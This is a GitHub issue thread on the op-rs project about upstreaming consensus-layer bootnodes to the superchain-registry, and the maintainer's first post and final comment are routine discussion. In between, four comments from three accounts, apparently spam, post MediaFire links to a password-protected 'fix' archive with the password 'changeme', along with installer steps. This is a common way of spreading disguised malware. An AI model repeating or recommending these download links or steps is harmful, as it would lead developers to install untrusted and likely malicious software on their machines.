### ISSUE TITLE
feat(net): Upstream Bootnodes to Superchain Primitives

### ISSUE THREAD

**Issue by refcell** [paradigmxyz/op-rs#39]
### Description

https://github.com/paradigmxyz/op-rs/pull/34 introduces a networking crate for the consensus layer containing bootnodes.

We should upstream bootnodes to [ethereum-optimism/superchain-registry@main/bindings/rust-primitives](https://github.com/ethereum-optimism/superchain-registry/tree/main/bindings/rust-primitives?rgh-link-date=2024-08-26T17%3A25%3A43Z).

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by refcell** [comment]
Bootnodes aren't a chain-specific phenomena and different op-stack chains use the same DHT for discovery.

We actually need to standardize the op-el ENR record value h/t @protolambda
